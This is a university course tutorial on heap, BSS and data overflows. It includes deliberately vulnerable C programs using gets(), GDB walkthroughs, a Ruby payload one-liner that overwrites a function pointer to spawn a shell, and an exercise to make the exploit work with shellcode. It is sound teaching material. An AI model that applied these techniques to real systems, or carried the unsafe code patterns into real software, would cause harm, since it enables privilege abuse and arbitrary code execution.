Heap Overflows

Introduction

Heap overflows are a type of buffer overflow and actually very similar to stack based buffer overflows. The main difference is that it it not as straightforward to execute custom code. Since you're overwriting information in the heap, you can't simply overwrite the return address of a function to use shellcode. There are a few other tactics that you can use, however.

Overwriting global data

The following program initializes variables that are stored in the heap.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main() {

  static char filename[] = "/tmp/heap-overflow.txt";
  static char buffer[64] = "";

  gets(buffer);

  FILE *fd = fopen(filename, "w");
  if (fd != NULL) {
      fputs(buffer, fd);
      fclose(fd);
  }

  return 0;
}

This looks pretty much exactly like a stack based buffer overflow, but there are a good number of differences. You cannot overwrite the return address of main like you could with a stack based buffer overflow. Like information on the stack, though, the compiler might put things in places that you might not expect. Different compilers may put buffer above filename in the heap, but GCC on Ubuntu 7.10 puts it below, allowing us to overwrite filename. The following demonstrates this:

wbyoung@netsec:~$ gcc -g vuln.c -o vuln
wbyoung@netsec:~$ gdb vuln
(gdb) b main
Breakpoint 1 at 0x8048435: file test.c, line 9.
(gdb) run
Starting program: /home/wbyoung/heap/a.out 

Breakpoint 1, main () at test.c:9
9     gets(buffer);
(gdb) n
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
11    FILE *fd = fopen(filename, "w");
(gdb) p filename
$1 = 'a' <repeats 15 times>, "\000ow.txt"
(gdb)

For programs that have special access, you can exploit these types of vulnerabilities to gain access to privileged files (like /etc/passwd and /etc/shadow).

To demonstrate some things to look for, let's make a small change to the program that we wrote initially. Simply remove the initialization of buffer.

static char buffer[64];

This small change will greatly affect the result. If you run through the same GDB instructions above, you'll see that printing the filename actually prints out /tmp/heap-overflow.txt. What happens, then, if you change the order in which they are declared:

static char buffer[64];
static char filename[] = "/tmp/heap-overflow.txt";

Recompiling and running through GDB will lead to the same result, filename remains unchanged. This is because the uninitialized buffer is actually stored in the .bss section of the compiled binary while filename is stored in the .data section. These nuances are important to realize when looking for heap overflow vulnerabilities.

Discuss what would happen if the following changes were made:

static char buffer[64];
static char filename[23];
strcpy(filename, "/tmp/heap-overflow.txt");

And what about:

static char filename[23];
static char buffer[64];
strcpy(filename, "/tmp/heap-overflow.txt");

After discussing what you think should happen with each of these changes, run them through GDB and see what happens.

Since these variables aren't actually stored in the program's heap, they're not actually heap overflows. They're BSS/Data overflows and often discussed in association with heap overflows.

Malloc

Overflow attacks against memory allocated with malloc and other memory management tools in the heap are also possible. Using the previous program, we can allocate data on the heap as follows:

char *filename = malloc(23);
char *buffer = malloc(64);
strcpy(filename, "/tmp/heap-overflow.txt");

If you run this through GDB, you'll find that you cannot overwrite filename. The initial setup initialized filename first and that worked, so what's happening here? As you should remember, the heap grows upward, so space is allocated for filename first, and then buffer is allocated above that. In order for this to work, buffer must be allocated first, so that it's below filename on the stack. Make this change and run it through GDB to verify that this is true.

Overflows that rely on malloc and memory in the heap have additional restrictions. Imagine the following (contrived) situation:

srand(time(0));
char *buffer = malloc(64);
char *a = malloc(rand() % 46);
char *b = malloc(12);
free(a);
char *filename = malloc(23);
strcpy(filename, "/tmp/heap-overflow.txt");

In this case, the distance between filename and buffer is not determinate. Though possible to always overwrite filename, it's a lot more difficult to overwrite it with the exact value that you want. For the most part, memory allocation in a program is determinate, and most (if not all) lib-c memory allocators are determinate. When a user inputs something and memory allocation is dependent on the input, however, heap layout becomes indeterminate. A program that runs for a long period of time (such as a threaded implementation of handling accepts while listening on a socket) will for all intensive purposes be indeterminate.

Function pointers

One useful trick is being able to overwrite function pointers. Though many programmers don't use them often, they can be very useful when exploiting programs.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void shell() {
  execlp("sh", NULL);
}

void nothing() {}

int main() {
  static void (*func)() = nothing;
  static char buffer[64] = "";

  gets(buffer);

  func();

  return 0;
}

This program should read a line of text and then execute the function nothing. It is vulnerable to an overflow attack, and we can change the program to execute the function shell instead of nothing.

wbyoung@netsec:~$ gdb a.out
(gdb) b main
Breakpoint 1 at 0x80483d6: file test.c, line 15.
(gdb) run
Starting program: /home/wbyoung/heap/a.out 

Breakpoint 1, main () at test.c:15
15    gets(buffer);
(gdb) p shell
$1 = {void ()} 0x80483a4 <shell>
(gdb) p nothing
$2 = {void ()} 0x80483c0 <nothing>
(gdb) p func
$3 = (void (*)()) 0x80483c0 <nothing>
(gdb)

As you can see, we want func to be changed to point to 0x80483a4, so let's use a few command line tools to set this up. Remember that the address should be reversed.

ruby -e 'print "a"*64 + "\xa4\x83\x04\x08"*12' > input

Now run the program again, reading from the input file.

wbyoung@netsec:~$ gdb a.out
(gdb) b main
Breakpoint 1 at 0x80483d6: file test.c, line 15.
(gdb) run < input
Starting program: /home/wbyoung/heap/a.out < input

Breakpoint 1, main () at test.c:15
15    gets(buffer);
(gdb) n
17    func();
(gdb) p func
$1 = (void (*)()) 0x80483a4 <shell>
(gdb) s
shell () at test.c:6
6     execlp("sh", NULL);
(gdb)

Note: In this case continuing will not execute the shell because execlp does not work in GDB.

The function pointer has successfully been updated to point to a different function. Using this same technique, you can change the function pointer to point anywhere in memory. You can therefore use this technique to execute shellcode as well.

Uses in stack-based buffer overflows

This tutorial outlined strategies to use with stack based buffer overflows. It's worth nothing, though, that all of the strategies outlined here can be used on standard stack-based buffer overflows. It may be easier or more useful in some cases to use these strategies.

Advanced heap overflows

Heap overflows actually include a class of exploits that are more complicated than those explained in this tutorial. Some of these exploits attack vulnerabilities in memory allocating functions such as malloc in lib-c. These vulnerabilities tend to be significantly more complicated and specific to certain versions of libraries, but if you have time, search for and read about them.

Classwork

Get the function pointer exploit to work outside of GDB. If you have time once you've completed that, get it to work with shellcode and no shell funciton.

Copyright 2008 the following:
Sam McIngvale sam.mcingvale@u.northwestern.edu
Jim Spadaro j-spadaro@northwestern.edu
Whitney Young wbyoung@u.northwestern.edu
All rights reserved. Permission to reproduce this document in whole or in part must be obtained from the authors.

Introduction to System Security

Northwestern CS, Winter Quarter 2023